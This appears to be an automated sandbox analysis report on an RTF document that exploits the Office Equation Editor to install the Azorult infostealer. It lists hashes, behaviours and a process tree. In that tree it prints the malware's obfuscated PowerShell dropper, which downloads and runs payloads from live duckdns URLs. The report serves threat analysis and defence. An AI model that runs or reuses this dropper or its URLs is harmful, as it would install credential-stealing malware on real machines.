Overview

overview

10

Static

static

usa (1).doc.rtf

windows7_x64

10

usa (1).doc.rtf

windows10_x64

1

Analysis

  • max time kernel
    62s
  • max time network
    67s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    10-07-2020 10:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    usa (1).doc.rtf

  • Size

    1.6MB

  • MD5

    2bb2d4cd00b57d4f9a23cf1f47235dcf

  • SHA1

    18e0c460dde1db288f547cc8a6265bf365587ebb

  • SHA256

    6d831aaa4b8ee1c41b519dad3a7de26c9cae4d71786609a178a62560697c4078

  • SHA512

    4753910b4bccef05872fdb3b10f837e26b609a53845bd64155b826d1c9e9027f8fbadb953286404bd8ead3720f6db5137dad28a40d8de19ea356af79c14dea46

Score
10/10
spywarediscoverytrojaninfostealerazorult

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://usa24i3.duckdns.org/usfold/109.mt
ps1.dropper

http://usa24i3.duckdns.org/usfold/us3459.m98

Signatures

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spyware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for installed software on the system 1 TTPs 30 IoCs
    discovery
  • Drops file in System32 directory 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blacklisted process makes network request 1 IoCs
  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spyware
  • Suspicious use of WriteProcessMemory 33 IoCs
  • Loads dropped DLL 16 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\usa (1).doc.rtf"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:112
  • C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:928
    • C:\Windows\SysWOW64\CmD.exe
      CmD.exe /C cscript %tmp%\usa.vbs A C
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1072
      • C:\Windows\SysWOW64\cscript.exe
        cscript C:\Users\Admin\AppData\Local\Temp\usa.vbs A C
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1512
        • C:\Windows\SysWOW64\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay
          4⤵
            PID:1828
          • C:\Windows\SysWOW64\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay
            4⤵
              PID:1868
            • C:\Windows\SysWOW64\svchost.exe
              C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay
              4⤵
                PID:1884
        • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
          Powershell $5C75D5D41AFE0AC5C76840D685E175C8325BABBAEFD4F0BBAD4E26AD6BC76BAE184=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,117,115,97,50,52,105,51,46,100,117,99,107,100,110,115,46,111,114,103,47,117,115,102,111,108,100,47,49,48,57,46,109,116,39,41,124,73,96,69,96,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,117,115,97,50,52,105,51,46,100,117,99,107,100,110,115,46,111,114,103,47,117,115,102,111,108,100,47,117,115,51,52,53,57,46,109,57,56,39,41,46,114,101,112,108,97,99,101,40,39,42,38,94,37,39,44,39,48,120,39,41,124,73,96,69,96,88,59,91,72,97,110,100,108,101,82,117,110,93,58,58,65,115,121,110,99,104,114,111,110,111,117,115,40,39,103,112,117,112,100,97,116,101,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($5C75D5D41AFE0AC5C76840D685E175C8325BABBAEFD4F0BBAD4E26AD6BC76BAE184)|I`E`X
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetThreadContext
          • Drops file in System32 directory
          • Process spawned unexpected child process
          • Blacklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:1776
          • C:\WINDOWS\syswow64\gpupdate.exe
            "{path}"
            2⤵
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Checks for installed software on the system
            • Loads dropped DLL
            PID:2024

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1512-6-0x00000000027A0000-0x00000000027A4000-memory.dmp

          Filesize

          16KB

          Download

        • memory/2024-9-0x0000000000400000-0x0000000000420000-memory.dmp

          Filesize

          128KB

          Download

        • memory/2024-7-0x0000000000400000-0x0000000000420000-memory.dmp

          Filesize

          128KB

          Download